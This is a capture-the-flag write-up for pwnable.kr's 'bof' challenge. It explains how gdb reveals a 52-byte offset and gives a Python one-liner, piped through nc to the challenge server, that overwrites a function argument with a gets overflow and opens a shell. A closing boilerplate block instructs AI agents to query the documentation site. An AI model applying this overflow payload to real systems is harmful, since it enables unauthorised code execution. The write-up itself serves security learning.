# 03 - bof ## The Challenge Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Running at: nc pwnable.kr 9000 ## The Solution This is a basic buffer overflow challenge. ![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFtSB4jczm510FtT83Z%2F-MFu2i2emcRauVlKbkXa%2Fimage.png?alt=media\&token=2f5fdbaf-ed6d-4e53-a813-a4e306b4d048) We need to override the argument of the function **func** using the unsafe **gets** function and the variable **overflowme**. Afterward, we need to maintain the connection to the server with the newly opened shell and obtain the flag. ### Finding the offset We're using **gdb**. Set a breakpoint at the beginning of the "func" function, and print the next 15 instructions to find **gets**. ![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFuIs6VCwEsQCWKXHXZ%2F-MFuPw66Nx3vRSLO5Z2K%2Fimage.png?alt=media\&token=f1c0795a-63b1-4adf-9cec-4f26accdf504) Here it is, at 0x5655564f. Set a breakpoint at the next instruction and continue execution. Enter easy to read input, like so ![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFuIs6VCwEsQCWKXHXZ%2F-MFuU7DcZvtN6GD9VTCa%2Fimage.png?alt=media\&token=437e9ae9-e261-407d-a07c-a870b772a953) Now examine 32 word-sized chunks of memory starting at ESP. ![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFuIs6VCwEsQCWKXHXZ%2F-MFuQsMfxC58dcAYPI3K%2Fimage.png?alt=media\&token=8c8b3dde-984a-4e75-9a14-0a9a053ef339) Here is our 32-byte input, and after an offset of 52 lies 0xdeadbeef. So, **52** is our offset. ### Python3 one-liner It turns out that python3 print() function encodes characters as a sequence of Unicode characters instead of a sequence of bytes \[[link](https://stackoverflow.com/questions/32017389/write-different-hex-values-in-python2-and-python3)]. Instead of print(), sys.stdout.buffer.write was used for the buffer. To gain a semi-interactive shell we sent over the **cat** command without arguments. From 'cat' man page: > With no FILE, or when FILE is -, read standard input. Try and run cat without arguments on your machine. it echoes back every input. By sending it to the newly opened shell on Pwnable's remote machine we get command execution with some interactivity. ``` (python3 -c "import sys; sys.stdout.buffer.write(b'A' * 52 + b'\xbe\xba\xfe\xca\n')" && cat) | nc pwnable.kr 9000 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://nickbhe.gitbook.io/shikata-ga-nai/pwnable.kr/03-bof.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.